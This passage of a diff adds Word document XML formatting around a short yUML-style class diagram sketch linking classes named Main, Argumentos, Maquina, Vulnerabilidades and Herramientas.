+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>// Sweet Class Diagram</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>// -------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>// Chain elements like this</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>// [Customer]&lt;&gt;-orders*&gt;[Order]++-0..*&gt;[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>LineItem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>[Main]-&gt;[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Maquina</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>[Main]-&gt;[Argumentos]-&gt;[Maquina]-&gt;[Vulnerabilidades]-&gt;[Herramientas]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Argumentos</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>]-&gt;[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Herramientas</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Maquina</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>]-&gt;[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Herramientas</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>]</w:t>
       </w:r>
     </w:p>
     <w:p>
